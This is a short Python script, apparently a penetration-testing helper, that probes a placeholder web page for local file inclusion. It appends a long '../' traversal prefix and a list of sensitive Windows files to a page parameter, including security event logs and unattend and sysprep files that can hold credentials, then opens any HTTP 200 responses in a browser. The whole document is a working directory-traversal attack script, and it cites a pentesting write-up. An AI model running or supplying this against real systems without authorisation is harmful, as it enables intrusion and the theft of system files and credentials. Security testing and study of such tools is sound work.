LFI Tester
import requests | |
import webbrowser | |
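# formatted using Black
# Reference write-up the file list below is taken from:
# https://blog.rapid7.com/2016/07/29/pentesting-in-the-real-world-local-file-inclusion-with-windows-server-files/

# Base URL of the page under test; each candidate path is appended to the
# `page` query parameter.
url = "http://www.testpage.com?page="
# Directory-traversal prefix placed in front of every candidate file.
LFI = "../../../../../../../../../"
# Windows file paths appended after the traversal prefix.
pages = [
    "boot.ini",
    "WINDOWS/system32/drivers/etc/hosts",
    "WINDOWS/system32/win.ini",
    "WINDOWS/system32/debug/NetSetup.log",
    "WINDOWS/system32/config/AppEvent.Evt",
    "WINDOWS/system32/config/SecEvent.Evt",
    "WINDOWS/Panther/unattend.txt",
    "WINDOWS/Panther/unattend.xml",
    "WINDOWS/Panther/unattended.xml",
    "WINDOWS/Panther/sysprep.inf",
]

# Seconds to wait for each response; requests.get() has no default timeout
# and would otherwise block indefinitely on a server that never answers.
TIMEOUT = 10

# Each request carries a long run of "../" in the `page` parameter, so the
# whole run is typically visible in the target's web-server access log.
for x in pages:
    # Build the URL once so the request and the browser open the same address.
    target = url + LFI + x
    try:
        check = requests.get(target, timeout=TIMEOUT)
    except requests.RequestException as err:
        # One failed or slow request should not abort the remaining checks.
        print(f"request failed for {x}: {err}")
        continue
    # HTTP 200 only shows that the server answered: many applications return
    # 200 with an error or default page. A hit is therefore opened in the
    # browser for manual review, not treated as confirmed file inclusion.
    if check.status_code == 200:
        webbrowser.open(target)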